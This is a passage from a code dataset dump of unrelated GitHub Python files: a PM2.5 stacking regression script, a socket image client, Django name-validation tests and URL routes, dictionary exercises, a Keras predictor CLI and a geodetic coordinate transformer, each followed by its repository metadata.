验证的预测结果\r\n yanre = model.predict(data[zhe]['test'][:, :-1])\r\n # 预测的预测结果\r\n prer = model.predict(data['predict'][:, :-1])\r\n yanzhenglist += list(yanre)\r\n yanzhenglist_real += list(data[zhe]['test'][:, -1])\r\n prelist.append(prer)\r\n # 每计算一折后,要计算训练、验证、预测数据的误差\r\n xx = self.RMSE(xul, data[zhe]['train'][:, -1])\r\n yy = self.RMSE(yanre, data[zhe]['test'][:, -1])\r\n pp = self.RMSE(prer, data['predict'][:, -1])\r\n errorlsit.append([xx, yy, pp])\r\n # 针对预测数据集的预测结果计算均值\r\n meanPre = np.mean(np.array(prelist), axis=0)\r\n # 开始结合\r\n self.yanzhneg_pr.append(yanzhenglist)\r\n self.yanzhneg_real = yanzhenglist_real\r\n self.predi.append(meanPre)\r\n self.preal = data['predict'][:, -1]\r\n # 储存误差\r\n self.error_dict['XGBoost'] = np.mean(np.array(errorlsit), axis=0)\r\n return print('1层中的XGBoost运行完毕')\r\n\r\n # CatBoost\r\n def CatBoost_First(self, data, catsign, depth=8, iterations=80000):\r\n\r\n # 存储每一折中验证数据集的预测结果\r\n yanzhenglist = []\r\n # 存储每一折中验证数据集的真实结果\r\n yanzhenglist_real = []\r\n # 存储每一折中预测数据集的预测结果\r\n prelist = []\r\n # 存储训练、验证、预测数据的误差\r\n errorlsit = []\r\n # 开始每一折的训练\r\n for zhe in [zheshu for zheshu in data.keys() if zheshu != 'predict']:\r\n model = cb.CatBoostRegressor(iterations=iterations, depth=depth, learning_rate=0.8, loss_function='RMSE')\r\n\r\n model.fit(data[zhe]['train'][:, :-1], data[zhe]['train'][:, -1], cat_features=catsign)\r\n # 注意存储验证数据集结果和预测数据集结果的不同\r\n # 训练数据集的预测结果\r\n xul = model.predict(data[zhe]['train'][:, :-1])\r\n # 验证的预测结果\r\n yanre = model.predict(data[zhe]['test'][:, :-1])\r\n # 预测的预测结果\r\n prer = model.predict(data['predict'][:, :-1])\r\n yanzhenglist += list(yanre)\r\n yanzhenglist_real += list(data[zhe]['test'][:, -1])\r\n prelist.append(prer)\r\n # 每计算一折后,要计算训练、验证、预测数据的误差\r\n xx = self.RMSE(xul, data[zhe]['train'][:, -1])\r\n yy = self.RMSE(yanre, data[zhe]['test'][:, -1])\r\n pp = self.RMSE(prer, data['predict'][:, -1])\r\n errorlsit.append([xx, yy, pp])\r\n # 针对预测数据集的预测结果计算均值\r\n meanPre = np.mean(np.array(prelist), axis=0)\r\n # 开始结合\r\n self.yanzhneg_pr.append(yanzhenglist)\r\n self.yanzhneg_real = yanzhenglist_real\r\n self.predi.append(meanPre)\r\n self.preal = data['predict'][:, -1]\r\n # 储存误差\r\n self.error_dict['CatBoost'] = np.mean(np.array(errorlsit), axis=0)\r\n return print('1层中的CatBoost运行完毕')\r\n\r\n'''\r\n第三部分:第二层的模型运行阶段 可以任意更换模型\r\n'''\r\nclass MODETWO:\r\n\r\n def __init__(self, in_tr_data, out_tr_data, in_pre_data, out_pre, fenmu, cha):\r\n self.xdata = in_tr_data\r\n self.ydata = out_tr_data\r\n\r\n self.xdatapre = in_pre_data\r\n self.ydapre = out_pre\r\n\r\n self.fen = fenmu\r\n\r\n self.cha = cha\r\n pass\r\n\r\n # BP神经网络回归\r\n def BP(self, hiddenlayers=3, hiddennodes=100, learn_rate=0.05, itertimes=50000,\r\n batch_size=200, activate_func='sigmoid', break_error=0.00000043):\r\n loss_trrr, loss_pree, sign, fir = bp.Ten_train(self.xdata, self.ydata, self.xdatapre, self.ydapre,\r\n hiddenlayers=hiddenlayers, hiddennodes=hiddennodes,\r\n learn_rate=learn_rate, itertimes=itertimes,\r\n batch_size=batch_size, activate_func=activate_func,\r\n break_error=break_error)\r\n # 因为上面的得出的RMSE是数据变换后的,因此要转换到原始的维度\r\n loss_trrr = np.array(loss_trrr) * self.fen\r\n\r\n loss_pree = np.array(loss_pree) * self.fen\r\n\r\n return loss_trrr, loss_pree, sign, fir\r\n\r\n'''\r\n第四部分:绘制图,绘制第一层各个模型中训练,验证数据的误差,\r\n以及最终的预测数据的真实值和误差值的对比\r\n'''\r\n# 定义绘制第一层模型训练、验证、预测数据的误差的函数\r\n# 根据字典绘制不同参数下评分的对比柱状图\r\ndef Plot_RMSE_ONE_Stacking(exdict, kaudu=0.2):\r\n '''\r\n :param exdict: 不同模型的RMSE 最小二乘回归误差的平方根\r\n :return: 柱状图\r\n '''\r\n # 参数组合列表\r\n palist = exdict.keys()\r\n # 对应的训练数据的评分\r\n trsore = [exdict[hh][0] for hh in palist]\r\n # 对应的测试数据的评分\r\n tesore = [exdict[hh][1] for hh in palist]\r\n # 对应的预测数据的评分\r\n presore = [exdict[hh][2] for hh in palist]\r\n\r\n # 开始绘制柱状图\r\n fig, ax = plt.subplots()\r\n # 柱的个数\r\n ind = np.array(list(range(len(trsore))))\r\n # 绘制柱状\r\n ax.bar(ind - kaudu, trsore, kaudu, color='SkyBlue', label='训练')\r\n ax.bar(ind, tesore, kaudu, color='IndianRed', label='测试')\r\n ax.bar(ind + kaudu, presore, kaudu, color='slateblue', label='预测')\r\n # xy轴的标签\r\n ax.set_ylabel('RMSE')\r\n ax.set_xlabel('Stacking第一层中的模型')\r\n # 设置刻度\r\n ax.set_xticks(ind)\r\n ax.set_xticklabels(palist)\r\n\r\n ax.grid()\r\n\r\n leg = ax.legend(loc='best', ncol=3, shadow=True, fancybox=True)\r\n leg.get_frame().set_alpha(0.8)\r\n plt.title('Stacking第一层中模型的RMSE')\r\n plt.savefig(r'C:\\Users\\GWT9\\Desktop\\Stacking_pm25.jpg')\r\n bot.file_helper.send_image(r'C:\\Users\\GWT9\\Desktop\\Stacking_pm25.jpg')\r\n return '一层不同模型对比'\r\n\r\n# 最终的预测数据的真实值和误差值的对比\r\n# 按照误差值从小到大排列的数据\r\ndef Pailie(realr, modelout, count=90):\r\n '''\r\n :param real: 预测数据集真实的数据\r\n :param modelout: 预测数据集的模型的输出值\r\n :param count: 进行数据对比的条数\r\n :return: 按照差值从小到大排列的数据\r\n '''\r\n relal_num = np.array(realr)\r\n modelout_num = np.array(modelout)\r\n # 随机选取\r\n fu = np.random.choice(list(range(len(realr))), count, replace=False)\r\n show_real, show_model = relal_num[fu], modelout_num[fu]\r\n # 计算差值\r\n sunnum = show_real - show_model\r\n # 首先组合三个数据列表为字典\r\n zuhedict = {ii: [show_real[ii], show_model[ii], sunnum[ii]] for ii in range(len(show_model))}\r\n # 字典按着值排序\r\n zhenshi = []\r\n yucede = []\r\n chazhi = []\r\n # 按着差值从大到小\r\n for jj in sorted(zuhedict.items(), key=lambda gy: gy[1][2]):\r\n zhenshi.append(jj[1][0])\r\n yucede.append(jj[1][1])\r\n chazhi.append(jj[1][2])\r\n return zhenshi, yucede, chazhi\r\n\r\n# 绘制预测值,真实值对比折线,以及与两值的误差柱状图\r\ndef recspre(yzhenshide, yyucede):\r\n # 获得展示的数据\r\n yreal, ypre, cha = Pailie(yzhenshide, yyucede)\r\n plt.figure()\r\n ax = plt.subplot(111)\r\n plt.grid()\r\n dign = np.arange(len(yreal))\r\n # 绘制真实值\r\n ax.scatter(dign, yreal, label='真实值', lw=2, color='blue', marker='*')\r\n # 绘制预测值\r\n ax.plot(dign, ypre, label='预测值', lw=2, color='red', linestyle='--', marker='.')\r\n # 绘制误差柱状图\r\n ax.bar(dign, cha, 0.1, label='真实值减去预测值', color='k')\r\n # 绘制0线\r\n ax.plot(dign, [0] * len(dign), lw=2, color='k')\r\n\r\n ax.set_ylim((int(min(cha)) - 1, int(max([max(yreal), max(ypre)]))))\r\n ax.set_xlim((0, len(dign)))\r\n\r\n ax.legend(loc='best')\r\n ax.set_title('北京市Pm2.5预测数据集结果对比')\r\n plt.savefig(r'C:\\Users\\GWT9\\Desktop\\Stacking_duibi.jpg')\r\n bot.file_helper.send_image(r'C:\\Users\\GWT9\\Desktop\\Stacking_duibi.jpg')\r\n return '完毕'\r\n\r\n# 绘制2条对比曲线\r\ndef plotcurve(trainone, pretwo):\r\n fig, axs = plt.subplots(2, 1, sharex=True)\r\n fig.subplots_adjust(hspace=0.1)\r\n axs[0].plot(range(len(trainone)), trainone, label='训练', lw=3, color='maroon')\r\n axs[0].legend()\r\n axs[1].plot(range(len(pretwo)), pretwo, label='验证', lw=3, color='sienna')\r\n axs[1].legend()\r\n plt.xlabel('迭代次数')\r\n axs[0].set_title('第2层模型:BPNN中训练和验证数据的成本函数值')\r\n plt.savefig(r'C:\\Users\\GWT9\\Desktop\\Stacking_errorr.jpg')\r\n bot.file_helper.send_image(r'C:\\Users\\GWT9\\Desktop\\Stacking_errorr.jpg')\r\n\r\n'''\r\n第五部分:Stacking主函数\r\n'''\r\n\r\nif __name__ == \"__main__\":\r\n # 第一层6个模型:随机森林,AdaBoost,GBDT,LightGBM,XGBoost,CatBoost\r\n\r\n # 下面依次为每个模型建立数据\r\n # 随机森林、AdaBoost,GBDT,LIghtGNM,XGBoost都是一样的\r\n rf_data = DATA()\r\n rf_data.CAtoDI() # 标签数字化\r\n data_rf = rf_data.Kfold() # 折数\r\n\r\n # CatBoost\r\n cat_data = DATA() # 不用处理\r\n data_cat = cat_data.Kfold() # 折数\r\n\r\n # 开始建立Stacking第一层的模型\r\n one_stacking = MODELONE()\r\n # 随机森林\r\n one_stacking.RF_First(data_rf)\r\n # AdaBoost\r\n one_stacking.Adaboost_First(data_rf)\r\n # GBDT\r\n one_stacking.GBDT_First(data_rf)\r\n # LightGBM\r\n one_stacking.LightGBM_First(data_rf)\r\n # XGBoost\r\n one_stacking.XGBoost_First(data_rf)\r\n # CatBoost\r\n one_stacking.CatBoost_First(data_cat, cat_data.catsign)\r\n\r\n # 第二层的数据准备\r\n one_stacking.DataStru()\r\n data_two = one_stacking.datai\r\n\r\n # 第二层的数据处理\r\n erce_data = DATA(datadict=data_two)\r\n erce_data.Normal()\r\n # 将训练数据集分为训练和验证数据集\r\n redata = erce_data.Kfold()\r\n #\r\n\r\n # 第二层建模,在这里不在进行交叉验证,因此只选一个数据集\r\n stacking_two = MODETWO(redata[0]['train'][:, :-1],\r\n np.array([redata[0]['train'][:, -1]]).T,\r\n redata[0]['test'][:, :-1],\r\n np.array([redata[0]['test'][:, -1]]).T,\r\n erce_data.fenmu, erce_data.cha)\r\n\r\n # 训练的输出值,预测的输出值, 每一次迭代训练和预测的误差\r\n lossrain, losspre, signi, gir = stacking_two.BP()\r\n\r\n\r\n\r\n # 训练完成后读取最优的参数,在计算最终的预测结果\r\n graph = tf.train.import_meta_graph(\"./pm25-%s.meta\" % signi)\r\n ses = tf.Session()\r\n graph.restore(ses, tf.train.latest_checkpoint('./'))\r\n op_to_restore = tf.get_default_graph().get_tensor_by_name(\"Sigmoid_%s:0\" % gir) # 这个tensor的名称和激活函数有关系,需要去BP的程序中获得\r\n w1 = tf.get_default_graph().get_tensor_by_name(\"x_data:0\")\r\n feed_dict = {w1: redata['predict'][:, :-1]}\r\n dgsio = ses.run(op_to_restore, feed_dict)\r\n\r\n preout = erce_data.fenmu * dgsio.T[0] + erce_data.cha\r\n\r\n # 绘制第一层中各个模型的误差图\r\n Plot_RMSE_ONE_Stacking(one_stacking.error_dict)\r\n # 绘制预测值,真实值对比折线,以及与两值的误差柱状图\r\n recspre(erce_data.fenmu * erce_data.nodata.values[:, -1] + erce_data.cha, preout)\r\n # 绘制第二层模型中的训练和验证误差\r\n plotcurve(lossrain, losspre)","repo_name":"Anfany/Machine-Learning-for-Beginner-by-Python3","sub_path":"Stacking/Stacking_Regression_pm25.py","file_name":"Stacking_Regression_pm25.py","file_ext":"py","file_size_in_byte":30146,"program_lang":"python","lang":"zh","doc_type":"code","stars":405,"dataset":"github-code","pt":"3"} +{"seq_id":"7405820901","text":"from socket import socket\nfrom json import loads\nfrom base64 import b64decode\n\ndef main():\n client = socket()\n client.connect(('localhost', 5566))\n print('连接服务器成功')\n # 定义一个保存二进制数据的对象a\n in_data = bytes()\n # 由于不知道服务器发送的数据有多大每次接收 1024 字节\n data = client.recv(1024)\n while data:\n # 将收到的数据拼接起来\n in_data += data\n data = client.recv(1024)\n # 将收到的二进制数据解码成 JSON 字符串并转换成字典\n # loads 函数的作用就是将 JSON 字符串转成字典对象\n my_dict = loads(in_data.decode('utf-8'))\n filename = my_dict['filename']\n filedata = my_dict['filedata'].encode('utf-8')\n with open('filedir/' + filename, 'wb') as f:\n # 将 base64 格式的数据解码成二进制数据并写入文件\n f.write(b64decode(filedata))\n print('图片已保存')\n\n# \"\"\"\n# 使用了 JSON 作为数据传输格式(对数据进行了序列化和反序列化的操作),但是 JSON 并不能携带二进制数据,\n# 因此对图片的二进制数据进行了 Base64 编码的处理.\n# > Base64 是一种用 64 个字符表示所有二进制数据的编码方式,通过将二进制数据每 6 位一组的方式重新组织,\n# > 刚好可以使用 0~9 的数字,大小写字母以及\"+\"和\"/\"总共64个字符表示从 000000 到 111111 的 64 种状态.\n# \"\"\"\n\nif __name__ == \"__main__\":\n main()","repo_name":"Dosimz/Python-100-Days-Study-Notes","sub_path":"基础心法第5层--心动/基于传输层协议的套接字编程/多线程图片客户端.py","file_name":"多线程图片客户端.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"zh","doc_type":"code","stars":79,"dataset":"github-code","pt":"3"} +{"seq_id":"29025084507","text":"import pytest\nfrom staff.person_profile.forms.head import HeadForm\n\n\nDEFAULT_POST_DATA = {\n 'first_name': 'Владимир',\n 'last_name': 'Спасский',\n 'middle_name': 'Климентович',\n 'first_name_en': 'Volodymyr',\n 'last_name_en': 'Spasskyi',\n 'position': 'разработчик',\n 'position_en': 'software developer\\r\\nnew line',\n}\nNO_ERRORS = {}\n\n\ndef _head_post_data(**kwargs):\n post_data = DEFAULT_POST_DATA.copy()\n post_data.update(kwargs)\n return post_data\n\n\nEDIT_HEAD_CASES = [\n # (<post data>: {<field_name>: <error_key>}),\n # valid\n (_head_post_data(), NO_ERRORS),\n (_head_post_data(\n preferred_name='Виктор Разработчик',\n preferred_name_en='Victor Developer',\n ), NO_ERRORS),\n (\n _head_post_data(\n first_name='Анна-Мария', last_name='Петров-Во ́дкин',\n middle_name='Зурабович Церетелиевич',\n first_name_en='Do Re Mi', last_name_en='Fa-Sol-la',\n ),\n NO_ERRORS\n ),\n (\n _head_post_data(\n first_name='Марина(Ґал\\'я)', last_name='Öбама(Усіновä)',\n middle_name='Ваçил\\'ьевнÄ',\n first_name_en='Galina', last_name_en='Brusnichkina',\n position='Должность(не моя)', position_en='Yo ́'\n ),\n {\n 'position_en': 'staff-invalid_latin_field',\n }\n ),\n (\n _head_post_data(\n first_name_en='Ga ́lina', last_name_en='Brusnichkina(Niyazova)',\n ),\n NO_ERRORS\n ),\n\n # invalid\n (\n _head_post_data(\n first_name='Марина 2-я', last_name='У', middle_name='Тимуровна()',\n first_name_en='Русские', last_name_en='символы',\n position_en='калькулятор'\n ),\n {\n 'first_name': 'staff-invalid_name_field',\n 'last_name': 'staff-invalid_name_field',\n 'middle_name': 'staff-invalid_name_field',\n 'first_name_en': 'staff-invalid_name_field',\n 'last_name_en': 'staff-invalid_name_field',\n 'position_en': 'staff-invalid_latin_field',\n }\n ),\n\n (\n _head_post_data(\n first_name='-Минусик', last_name='(Скобкин)', middle_name='\\'квчк',\n first_name_en='Joseph--mcDonaldas', last_name_en='X Y-Z',\n ),\n {\n 'first_name': 'staff-invalid_name_field',\n 'last_name': 'staff-invalid_name_field',\n 'middle_name': 'staff-invalid_name_field',\n 'first_name_en': 'staff-invalid_name_field',\n 'last_name_en': 'staff-invalid_name_field',\n }\n ),\n\n (\n _head_post_data(\n first_name='', last_name='', middle_name='(NotAtAll)',\n first_name_en='', last_name_en='', position=''\n ),\n {\n 'first_name': 'default-field-required',\n 'last_name': 'default-field-required',\n 'middle_name': 'staff-invalid_name_field',\n 'first_name_en': 'default-field-required',\n 'last_name_en': 'default-field-required',\n 'position': 'default-field-required',\n }\n ),\n\n (\n _head_post_data(\n first_name=(\n 'Гиясаддин Абуль-Фатх Омар ибн Ибрахим аль-Хайям Нишапури'\n ),\n last_name=(\n 'Гиясаддин Абуль-Фатх Омар ибн Ибрахим аль-Хайям Нишапури '\n 'Гиясаддин Абуль-Фатх Омар ибн Ибрахим аль-Хайям Нишапури'\n ),\n middle_name=(\n 'очень длинное отчество очень длинное '\n 'отчество очень длинное отчество'\n ),\n first_name_en=(\n 'longlonglonglonglonglonglonglonglonglonglonglonglonglonglong'\n ),\n last_name_en=(\n 'longlonglonglonglonglonglonglonglonglonglonglonglong'\n 'longlonglonglonglonglonglonglonglonglonglonglonglong'\n )\n ),\n {\n 'first_name': 'default-field-max_length',\n 'last_name': 'default-field-max_length',\n 'middle_name': 'default-field-max_length',\n 'first_name_en': 'default-field-max_length',\n 'last_name_en': 'default-field-max_length',\n }\n ),\n]\n\n\n@pytest.mark.parametrize('test_data', EDIT_HEAD_CASES)\ndef test_form_validation(test_data):\n form_data, supposed_errors = test_data\n form = HeadForm(form_data)\n assert form.is_valid() == (not supposed_errors)\n assert set(supposed_errors.keys()) == set(form.errors.keys())\n for error_field, error_key in supposed_errors.items():\n assert form.errors[error_field][0]['error_key'] == error_key\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/tests/forms/head_form_test.py","file_name":"head_form_test.py","file_ext":"py","file_size_in_byte":5008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42969108309","text":"# -*- coding: utf-8 -*-\n\nfrom . import views\n\nfrom django.urls import path\n\napp_name = 'DDL'\nurlpatterns = [\n\n path('', views.loadHomePage, name='loadHomePage'),\n path('^OrderOnline/$',views.OrderOnline, name='OrderOnline'),\n path('^FlashDeliverPrice/$',views.FlashDeliverPrice, name='FlashDeliverPrice'),\n path('^CodeLoginPage/$',views.CodeLoginPage, name='CodeLoginPage'),\n path('^ConfirmOrder/$',views.ConfirmOrder, name='ConfirmOrder'),\n path('^MyFlashDeliver/$',views.MyFlashDeliver, name='MyFlashDeliver'),\n path('^SchoolFlashDriver/$',views.SchoolFlashDriver,name='SchoolFlashDriver'),\n path('^SignupPage/$',views.SignupPage,name='SignupPage'),\n path('^LoginPage/$',views.LoginPage,name='LoginPage'),\n path('^recharge/$',views.Recharge,name='Recharge'),\n path('^MyBalance/$',views.Mybalance,name='Mybalance'),\n path('^regist/$', views.regist, name='regist'),\n path('^login/$', views.login, name='login')\n]\n\n","repo_name":"MrRainbowYoo/FlashDeliver","sub_path":"DDL/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73472766482","text":"programming_dictionary = {\"Bug\": \"An error in a program that prevents the program from running as expected\", \n\t\"Function\": \"A piece of code that you can easily call over and over again\",\n\t\"Loop\": \"Tha action of doing something over and over again\"\n}\n\nprint(programming_dictionary['Bug'])\n\n# adding new key\nprogramming_dictionary['must']: \"to add a new data\"\n\n# changing key values\nprogramming_dictionary['must']: \"Ypu should add a number\"\n\n# # making dictionary empty\n# programming_dictionary = {}\n\n# loop through a dictionary\nfor thing in programming_dictionary:\n\tprint(thing)\n\tprint(programming_dictionary[thing])\n\n\n\n\n# grading criteria system\n\nstudent_score = {\n\t\"Harry\": 81,\n\t\"Ron\": 78,\n\t\"Hermoine\": 99,\n\t\"Draco\": 74,\n\t\"Neville\": 62\n}\n\nstudent_grade = {}\n\nfor name in student_score:\n\tscore = student_score[name]\n\tif score > 90:\n\t\tstudent_grade[name] = 'Outstanding'\n\telif score > 80:\n\t\tstudent_grade[name] = 'Exceeds Expectation'\n\telif score > 70:\n\t\tstudent_grade[name] = \"Acceptable\"\n\telif score <= 70:\n\t\tstudent_grade[name] = \"Fail\"\n\nprint(student_grade)\n\n# nesting of dictinary with list\n\n# normal dict\ncountry = {\n\t\"france\": \"paris\",\n\t\"germany\": \"Berlin\"\n}\n\n# dict with list as values of key\ncountry_travel = {\n\t\"France\" : ['peris', 'Lille'],\n\t\"Germany\": ['stuggart', 'berlin', 'Hamburg']\n}\n\n# dict with dict and list\n\ncountry_travel_value = {\n\t\"France\" : {\"city_visited\":['peris', 'Lille'], \"total_visits\": 12},\n\t\"Germany\": {\"city_visited\": ['stuggart', 'berlin', 'Hamburg'], \"total_visits\": 22}\n}\nprint(country_travel_value)\n\n# nesting dict in list\ntravel_log = [\n\t{\n\t \"country\":\"France\", \n\t \"city_visited\":['peris', 'Lille'], \n\t \"total_visits\": 12\n\t},\n\t{\n\t \"country\":\"Germany\", \n\t \"city_visited\": ['stuggart', 'berlin', 'Hamburg'], \n\t \"total_visits\": 22\n\t}\n]\n\n\ndef add_new_country(country, time, city):\n\tnew = {}\n\tnew['country'] = country\n\tnew['city_visited'] = city\n\tnew['total_visits'] = time\n\treturn new\n\ndictinary = add_new_country(\"Russia\", 2, [\"Moscow\", \"Saint\"])\ntravel_log.append(dictinary)\n\nprint(travel_log)","repo_name":"harshesh/100Days-python","sub_path":"day9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73975290001","text":"# Imports\nimport sys\nimport argparse\nimport json\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom os import listdir\nfrom os.path import isfile, join\nfrom PIL import Image\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# Methods\ndef prepareImg(image, label, imgShape):\n image = tf.cast(image, tf.float32) # Typecast raw image values to float32\n image = tf.image.resize(image, tuple(imgShape)) # Overwrite image with resized image\n image /= 255.0 # Normalize to maximum value of byte which is used to display R/G/B channels ((2^8)-1 = 255)\n return image, label\n\ndef process_image(npImg, imgShape):\n tensor = tf.convert_to_tensor(npImg) # Convert NP array to TF tensor\n prepImg, dummy = prepareImg(tensor, None, imgShape) # Returns resized + normalized image\n return prepImg.numpy()\n\ndef predict(image_path, model, top_k):\n # Load image from path and do pre-processing\n loadedImg = Image.open(image_path)\n loadedNpImg = np.asarray(loadedImg)\n inputLayerShape = model.layers[0].input_shape[1:3] # Get shape of input layer of Kera model, example for .input_shape[]: (None, 224, 224, 3)\n procImg = np.expand_dims(process_image(loadedNpImg, inputLayerShape), axis=0) # Add extra dimension at position 0 (=first position, axis does not mean row/col here)\n\n # Perform feedforward prediction to retrieve probs\n predProbs = model.predict(procImg) # get probabilities for classes given the provided image\n \n # Provide probabilities and classes\n topKsIdx = (-1 * predProbs[0]).argsort()[:top_k] # Get indices of top k (highest) probabilities; use negative numbers for all vals to get correct order\n probs = [predProbs[0][i] for i in topKsIdx] # contains top k probs\n classes = topKsIdx + 1 # add +1 to represent class number as there is no class '0'\n return probs, classes\n\n# Parse arguments from CLI\nparser = argparse.ArgumentParser(description='Keras Predictor - script that can predict probabilities and classes for given images')\n\nparser.add_argument(dest='imgPath', action='store', type=str, help='File path to the image to be classified. If a directory is passed, the whole directory will be used.')\nparser.add_argument(dest='modelPath', action='store', type=str, help='File path to the image to be classified')\nparser.add_argument('--top_k', dest='top_k', type=int, action='store', default=1,\\\n help='Return the top k most likely classes')\nparser.add_argument('--category_names', dest='jsonPath', type=str, action='store', default='',\\\n help='Add file path to JSON file to map class IDs to category names')\n \nargs = vars(parser.parse_args()) # Store args\n\n# Get all absolute files in image directory\nimgPath = args['imgPath']\nif imgPath.endswith(('.jpg', '.png', '.gif')):\n absFilePaths = [imgPath]\nelse:\n absFilePaths = [join(imgPath,f) for f in listdir(imgPath) if isfile(join(imgPath,f))] # Check for all folders/files in dir and only use files\n\n# Load model\ntry:\n model = tf.keras.models.load_model(args['modelPath'], custom_objects={'KerasLayer':hub.KerasLayer})\nexcept:\n print(\"Not able to load the Keras model from the given path. Please check and try again.\")\n sys.exit() # Exit due to unsolveable isse\n\n# Predict for all files in directory\nfor imgFilePath in absFilePaths:\n try:\n probs, classes = predict(imgFilePath,model,args['top_k'])\n except:\n print(\"Not able to make predictions for the given images path. Please check and try again.\")\n sys.exit() # Exit due to unsolveable isse\n \n # Get class names from json if argument was passed \n class_names = {}\n try:\n if args['jsonPath'] != '':\n with open(args['jsonPath'], 'r') as f:\n class_names = json.load(f)\n except:\n print(\"Not able to load the category names from the given JSON path. Please check and try again.\")\n sys.exit() # Exit due to unsolveable isse\n \n # Print corresponding file path, predictions and classes / class names\n print(\"Evaluated sample: {}\".format(imgFilePath))\n for i in range(len(probs)):\n if len(class_names) > 0: # JSON class names defined\n print(\"Rank #{}: Class '{}' with a probability of {:.0%}\".format(i,class_names[str(classes[i])],probs[i]))\n else:\n print(\"Rank #{}: Class '{}' with a probability of {:.0%}\".format(i,classes[i],probs[i]))","repo_name":"fabianprx/mlnd_image_classifier","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28742612905","text":"import googlemaps\nimport numpy as np\nimport math\n\nfrom utils import R_x, R_z\nfrom pyproj import CRS, Transformer, Proj\nfrom haversine import haversine\nfrom constants import (\n GMAPS_KEY,\n TOP_LEFT_CORNER,\n BOTTOM_RIGHT_CORNER,\n TOP_RIGHT_CORNER,\n BOTTOM_LEFT_CORNER,\n IMAGE_HEIGHT,\n IMAGE_WIDTH,\n ORIGIN,\n)\n\n\nclass MyTransformer:\n \"\"\"Coordinate and Reference Frame Transformer\"\"\"\n\n @staticmethod\n def transform(lat, lon):\n \"\"\"Transforms (lat, lon) ECEF into (e, n) ENU\"\"\"\n wgs84_geod = CRS.from_epsg(4326)\n wgs84_geoc = CRS.from_epsg(4978)\n transformer = Transformer.from_crs(wgs84_geod, wgs84_geoc)\n\n xyzORIGIN = np.array([*transformer.transform(ORIGIN[0], ORIGIN[1], 89)])\n xyzPoint = np.array([*transformer.transform(lat, lon, 89)])\n\n return tuple(\n np.array(\n [\n *(\n (xyzPoint - xyzORIGIN)\n @ R_z(math.radians(ORIGIN[1]) + np.pi / 2)\n @ R_x(np.pi / 2 - math.radians(ORIGIN[0]))\n )\n ]\n )[:2]\n )\n\n @staticmethod\n def invtransform(e, n):\n \"\"\"Transforms (e, n) ENU into (lat, lon) ECEF\"\"\"\n wgs84_geod = CRS.from_epsg(4326)\n wgs84_geoc = CRS.from_epsg(4978)\n transformer = Transformer.from_crs(wgs84_geod, wgs84_geoc)\n invtransformer = Transformer.from_crs(wgs84_geoc, wgs84_geod)\n\n xyzORIGIN = np.array([*transformer.transform(ORIGIN[0], ORIGIN[1], 89)])\n enuPoint = np.array([e, n, 0])\n\n xyzPoint = tuple(\n np.array(\n [\n *(\n enuPoint\n @ R_x(math.radians(ORIGIN[0]) - np.pi / 2)\n @ R_z(-math.radians(ORIGIN[1]) - np.pi / 2)\n + xyzORIGIN\n )\n ]\n )\n )\n\n return tuple(\n np.array(\n [*invtransformer.transform(xyzPoint[0], xyzPoint[1], xyzPoint[2])]\n )[:2]\n )\n\n\nclass Map:\n \"\"\"Path planning (using google maps API for now)\"\"\"\n\n def __init__(self) -> None:\n self.gmaps = googlemaps.Client(key=GMAPS_KEY)\n\n self.transformer = MyTransformer()\n\n self.top_left_coord = np.array(\n [*self.transformer.transform(TOP_LEFT_CORNER[0], TOP_LEFT_CORNER[1])]\n )\n self.bottom_right_coord = np.array(\n [\n *self.transformer.transform(\n BOTTOM_RIGHT_CORNER[0], BOTTOM_RIGHT_CORNER[1]\n )\n ]\n )\n self.top_right_coord = np.array(\n [*self.transformer.transform(TOP_RIGHT_CORNER[0], TOP_RIGHT_CORNER[1])]\n )\n self.bottom_left_coord = np.array(\n [*self.transformer.transform(BOTTOM_LEFT_CORNER[0], BOTTOM_LEFT_CORNER[1])]\n )\n self.scale_x = IMAGE_WIDTH / (\n np.linalg.norm(self.bottom_left_coord - self.bottom_right_coord)\n )\n self.scale_y = IMAGE_HEIGHT / (\n np.linalg.norm(self.top_left_coord - self.bottom_left_coord)\n )\n\n def rotate_points(self, points: np.array, angle: float):\n \"\"\"Rotates the points by `angle` radians\n\n Parameters\n ----------\n\n points: np.array of shape (N, 2)\n Points to be rotated\n\n angle: float\n Angle in radians\n\n Returns\n -------\n\n np.array of shape (N, 2)\n Rotated points\n \"\"\"\n\n rotation_matrix = np.array(\n [\n [np.cos(angle), -np.sin(angle)],\n [np.sin(angle), np.cos(angle)],\n ]\n )\n\n return np.array([rotation_matrix @ point for point in points])\n\n def verify_point(self, point, threshold=0.01):\n \"\"\"Checks if the point is valid\n\n Parameters\n ----------\n\n point: np.array of shape (2, )\n Point to be checked\n\n Returns\n -------\n\n bool\n True if the point is within the map, False otherwise\n \"\"\"\n new_point = self.gmaps.nearest_roads(point)\n new_point = np.array(\n [\n new_point[0][\"location\"][\"latitude\"],\n new_point[0][\"location\"][\"longitude\"],\n ]\n )\n\n # disance between the point and the nearest road\n distance = haversine(point, new_point)\n\n # maybe pass to x, y so that we can better understand the distance limit\n\n if distance < threshold:\n return True\n return False\n\n def get_coordinates(self, latitude: float, longitude: float):\n \"\"\"Transforms latitude and longitude to cartesian coordinates\n\n Parameters\n ----------\n\n latitude: float\n Latitude in degrees\n\n longitude: float\n Longitude in degrees\n\n Returns\n -------\n\n np.array of shape (2, )\n Cartesian coordinates\n \"\"\"\n arr = np.array(\n [\n np.array([*self.transformer.transform(latitude, longitude)])\n # - self.bottom_left_coord\n ]\n )\n\n return arr * np.array([self.scale_x, self.scale_y])\n\n def get_latlon(self, east: float, north: float):\n \"\"\"Transforms cartesian coordinates into latitude and longitude\n\n Parameters\n ----------\n\n east: float\n East (x) coordinate in meters\n\n north: float\n North (y) coordinate in meters\n\n Returns\n -------\n\n np.array of shape (2, )\n Geodetic coordinates\n 